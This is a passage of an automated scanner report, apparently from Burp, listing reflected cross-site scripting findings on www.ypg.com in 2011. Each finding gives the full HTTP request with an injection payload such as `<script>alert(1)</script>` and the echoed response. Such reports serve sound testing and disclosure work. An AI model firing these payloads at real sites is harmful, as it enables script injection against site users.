Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en10219--><img src=a onerror=alert(1)>876ba4af52c)
        </p>
...[SNIP]...
4.167. http://www.ypg.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6 was submitted in the REST URL parameter 1. This input was echoed as 20d27--><img src=a onerror=alert(1)>2a43138dda6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6/ HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=s8o0kouqh74u2emhbtb2k7omj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en20d27--><img src=a onerror=alert(1)>2a43138dda6)
        </p>
...[SNIP]...
4.168. http://www.ypg.com/en/contact-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306 was submitted in the REST URL parameter 1. This input was echoed as b7f66--><img src=a onerror=alert(1)>ad5f6912306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /enb7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306/contact-us HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:29:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (enb7f66--><img src=a onerror=alert(1)>ad5f6912306)
        </p>
...[SNIP]...
4.169. http://www.ypg.com/en/contact-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6b7ce--><script>alert(1)</script>d71bb51e7af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(55) "/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af"
[3]=>
...[SNIP]...
4.170. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdfd1'><script>alert(1)</script>22ec70f7aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:28:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<a target="_blank" href='/en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1?print=1'>
...[SNIP]...
4.171. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354 was submitted in the REST URL parameter 1. This input was echoed as 8bd59--><img src=a onerror=alert(1)>f48834a7354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:30:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en8bd59--><img src=a onerror=alert(1)>f48834a7354)
        </p>
...[SNIP]...
4.172. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload c52da><script>alert(1)</script>1d3ad9b9a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3Cc52da><script>alert(1)</script>1d3ad9b9a08/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c52da><script>alert(1)</script>1d3ad9b9a08/style>
...[SNIP]...
4.173. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload c7754><script>alert(1)</script>db21f56eda7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3Cc7754><script>alert(1)</script>db21f56eda7/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c7754><script>alert(1)</script>db21f56eda7/script>
...[SNIP]...
4.174. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload 754e1><script>alert(1)</script>4412e20be66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/754e1><script>alert(1)</script>4412e20be66/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</754e1><script>alert(1)</script>4412e20be66/script>
...[SNIP]...
4.175. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b17ae%3balert(1)//42d657bd22f was submitted in the REST URL parameter 4. This input was echoed as b17ae;alert(1)//42d657bd22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3Cb17ae%3balert(1)//42d657bd22f/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<b17ae;alert(1)//42d657bd22f/script>
...[SNIP]...
4.176. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea846%3balert(1)//f47b0af8e66 was submitted in the REST URL parameter 5. This input was echoed as ea846;alert(1)//f47b0af8e66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/ea846%3balert(1)//f47b0af8e66 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</ea846;alert(1)//f47b0af8e66"
[3]=>
...[SNIP]...
4.177. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7a283<script>alert(1)</script>472a5342049 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E7a283<script>alert(1)</script>472a5342049 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>7a283<script>alert(1)</script>472a5342049"
[3]=>
...[SNIP]...
4.178. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d9793<script>alert(1)</script>c26675cd183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E?d9793<script>alert(1)</script>c26675cd183=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["d9793<script>alert(1)</script>c26675cd183"]=>
...[SNIP]...
4.179. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df was submitted in the REST URL parameter 1. This input was echoed as 96651--><img src=a onerror=alert(1)>14a5bb298df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df/images/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

